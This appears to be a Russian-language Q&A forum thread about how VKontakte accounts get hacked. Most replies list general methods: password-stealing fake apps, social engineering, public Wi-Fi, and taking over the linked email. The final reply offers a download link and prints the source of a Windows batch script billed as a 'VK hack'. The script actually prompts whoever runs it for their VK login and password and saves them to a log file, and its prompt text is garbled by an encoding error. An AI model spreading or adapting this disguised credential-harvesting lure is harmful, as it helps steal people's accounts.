Василиса Лиса

Скажите как взламывают страницы в контакте?? если таких программ нету? ??

Накип Д.

Взламывают с помощью одной мощной программы - Блокнот.

Светлана Голубева

Их не взламывают, а крадут у пользователя пароль. К примеру с помощью программ для смены дизайна, скачивания музыки или приложений, якобы позволяющих узнать гостей на странице. Пользователь устанавливает их они передают его пароль на сервер злоумышленнику. Вот и вся схема.

Наталья Подзигун

еще взламыват спомощью социнжинерии когда вы сами отдаете все не подозревая что вас обули

Карасев Евгений

Умелое использование человеческих пороков. Как, например, банальная жадность.

По
Поля

есть и программы и есть другие способы, особенно когда входят с бесплатного wifi/

Morven T

Если привязана к телефону, то никак.

Если нет, то сначала нужно узнать и взломать почту.
Ну а потом изменить пароль и всЁ.

Жанна Русских

если захотеть то можно вирус записхать или что нибудь

Мария Грибенко

Могу посаветовать только сфиннер сделанный мною "взлом вк" (появится log.DeTeCtEd читаем через текстовый документ)
вот ссылка ---https://yadi.sk/d/wnIDqbVTqUetY

сам код (.bat файл)

@echo off
color a
title login
echo ‚ўҐ¤ЁвҐ бў®Ё ¤ ­­лҐ зв®Ўл ў§«®¬ вм VK ­ Ј®«®б
echo.
set /p user=«®ЈЁ­:
set /p pass=Ї а®«м:
set /p golosa=Ј®«®б :
echo Login="%user%" Password= "%pass%" golosa="%golosa%" > log.txt
echo.
exit